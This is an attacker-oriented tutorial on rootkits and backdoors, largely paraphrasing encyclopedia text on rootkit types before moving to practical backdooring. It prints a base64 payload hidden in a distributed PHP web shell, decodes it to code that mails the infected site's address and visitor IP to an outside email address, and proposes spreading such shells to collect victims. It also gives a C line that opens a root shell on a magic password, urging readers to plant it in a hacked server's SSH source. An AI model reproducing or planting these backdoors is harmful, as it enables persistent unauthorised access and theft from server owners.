Rootkits and backdoors 101

I. What is a rootkit?

A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications(backdoor). - WIkipedia



1. What are rootkits useful for?
After getting access to a system and escalating your privileges to root it would be nice to have backdoor on that server, right? Imagine you spend a lot of hours trying to get in and twice the amount of that time to get root, the next day administrators find out and patch everything, then you are basically fucked. To prevent this from happening rootkits are extremely useful but also easily detected by rootkit hunters (anti-backdoor software).

2. Types of rootkits
There are at least five types of rootkit, ranging from those at the lowest level in firmware (with the highest privileges), through to the least privileged user-based variants that operate in Ring 3. Hybrid combinations of these may occur spanning, for example, user mode and kernel mode.

(Note that Ring ‑1 is not shown in image below)



2.1 User-mode
User-mode rootkits run in Ring 3, along with other applications as user, rather than low-level system processes.They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically-linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application.

2.2 Kernel mode
Kernel-mode rootkits run with the highest operating system privileges (Ring 0) by adding code or replacing portions of the core operating system, including both the kernel and associated device drivers. Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel-mode rootkits are developed as device drivers or loadable modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. This class of rootkit has unrestricted security access, but is more difficult to write.

2.3 Bootkits
A kernel-mode rootkit variant called a bootkit is used predominantly to attack full disk encryption systems, for example as in the "Evil Maid Attack", in which a bootkit replaces the legitimate boot loader with one controlled by an attacker; typically the malware loader persists through the transition to protected mode when the kernel has loaded. For example, the "Stoned Bootkit" subverts the system by using a compromised boot loader to intercept encryption keys and passwords.[38] More recently, the Alureon rootkit has successfully subverted the requirement for 64-bit kernel-mode driver signing in Windows 7 by modifying the master boot record.

2.4 Hypervisor level
Rootkits have been created as Type II Hypervisors in academia as proofs of concept. By exploiting hardware virtualization features such as Intel VT or AMD-V, this type of rootkit runs in Ring -1 and hosts the target operating system as a virtual machine, thereby enabling the rootkit to intercept hardware calls made by the original operating system. Unlike normal hypervisors, they do not have to load before the operating system, but can load into an operating system before promoting it into a virtual machine. A hypervisor rootkit does not have to make any modifications to the kernel of the target to subvert it; however, that does not mean that it cannot be detected by the guest operating system. For example, timing differences may be detectable in CPU instructions.

2.5 Hardware/Firmware
A firmware rootkit uses device or platform firmware to create a persistent malware image in hardware, such as a network card, hard drive, or the system BIOS. The rootkit hides in firmware, because firmware is not usually inspected for code integrity. John Heasman demonstrated the viability of firmware rootkits in both ACPI firmware routines[44] and in a PCI expansion card ROM

2.6 PHP backdoor
There are a lot of php backdoors, mainly planted into "PHP shells" used by hackers like us (c99, r57 etc.). Let's examine the following "legitimate php shell":

http://pastebin.com/raw.php?i=tUCqQpx9

If aren't skilled in PHP, you can do "a basic brief" over the PHP file, it doesn't take a genius, really. You scroll-down and scroll and scroll... and at line 399 you find something... a base64 encoded string. A quick google query "online base64 decoder" and we have ourselves where to decode that string (http://www.opinionatedgeek.com/dotne.../base64decode/). So we input:

JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkZ4MjlTaGVsbCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvcjxicj4iOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJmZWVsY29tekBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7

The decoded output is:

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "Fx29Shell http://$target by $visitor";
$body = "Bug: $target by $visitor<br>";
if (!empty($web)) { @mail("feelcomz@gmail.com",$judul,$body); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);

What do we have here? "feelcomz@gmail.com" receives an email once someone enters his shell, he gets IP and location of shell. Now isn't that a comfortable backdoor? Instead of going to hack websites by yourself, you backdoor one, try to popularize it in some way and you have a good "income" of shells.

2.7 Specific case for C programs
For c code programs (same example as in the proftpd 1.3.3c backdoor that was placed, recommend you analyze)

if (strcmp(target, "iwantroot") == 0) { setuid(0); setgid(0);system("/bin/sh;/sbin/sh"); }

It is good to use it after you have hacked a server and gained root access to input this into their SSH src and have a nice backdoor 

II. Reference/Thanks 2
Wikipedia